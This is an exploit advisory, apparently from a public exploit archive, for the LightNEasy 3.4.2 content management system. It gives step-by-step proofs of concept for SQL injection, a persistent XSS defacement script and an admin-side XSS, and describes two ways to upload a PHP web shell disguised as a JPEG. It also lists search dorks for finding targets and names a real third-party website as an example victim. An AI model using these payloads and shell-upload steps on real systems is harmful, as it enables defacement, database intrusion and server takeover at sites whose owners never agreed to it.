:-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : LightNEasy 3.4.2 Multiple Vulnerabilities : # Date : 05 November 2011 : # Author : X-Cisadane : # Software Link : http://www.lightneasy.org/downloads.php : # Version : 3.4.2 : # Category : Web Applications : # Vulnerability : SQL Injection, Persistent XSS & Upload Shell : # Tested On : Google Chrome 14.0.835 (Windows) : # Dorks : inurl:LightNEasy.php?page OR intext:Powered by LightNEasy : # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari :-------------------------------------------------------------------------------------------------------------------------: POC : 1.SQL Injection Vulnerability - Open Victim Website : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=news&id='1 Example : http://demo.lightneasy.org/LightNEasy.php?page=news&id='1 http://lightneasy.org/demo/LightNEasy.php?page=news&id='1 http://www.houstonbicyclemuseum.org/LightNEasy.php?page=news&id='1 2.Persistent XSS Vulnerability - Open Victim Website : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=news - Fill The Comment With This Script : <script>document.body.innerHTML="<h1>XSS Defacing</h1>This Site Has XSSed By : X-Cisadane<br/>Greetz To : XCode, Hacker Cisadane, Depok Cyber, Muslim Hackers, Dunia Santai, Borneo Crew, Jiban Crew, etc<br/>Please patch your system";</script> - ReOpen The URL (http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=news) Pic : http://i40.tinypic.com/1zdw74j.png 3.Persistent XSS Vulnerability (Required Admin Previlleges!) - Logon As Admin & Go To : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=survey - Fill Survey Name Field, With This Script : <script>alert("xss")</script> - ReOpen The URL (http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=survey) Pic : http://i44.tinypic.com/5nk7xu.png 4.Upload Shell Vulnerability (Required Admin Previlleges!) - Logon As Admin & Go To : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=gallery - Create Gallery. Gallery Name : Test (For Example). - Upload Image. Image Name : Shell.jpg. Choose File (Browse Your Shell.php). Upload To Gallery : Test (For Example). Click Upload Image. - Voila! Open URL : http://<site>/<LightNEasy Installation Path>/galeries/GALLERY NAME HERE/YOUR SHELL.PHP HERE Example : http://localhost/webtest/galeries/test/c100shell.php Pic : http://i44.tinypic.com/v63v2q.png 5.Upload Shell Vulnerability (Required Admin Previlleges!) - Logon As Admin & Go To : http://<site>/<LightNEasy Installation Path>/LightNEasy.php?page=index&do=downloads - Fill Downloads Name : Shell.jpg. Then Upload Your File, Choose File (Browse Your Shell.php). Fill File Name : Shell.jpg (For Example). Then Scroll Down On The Options, Select : Downloads. Finally Click Add Download! - Voila! Open URL : http://<site>/<LightNEasy Installation Path>/downloads/YOUR SHELL.PHP HERE Example : http://localhost/webtest/downloads/c100shell.php -= Regards =- Dwi X-Cisadane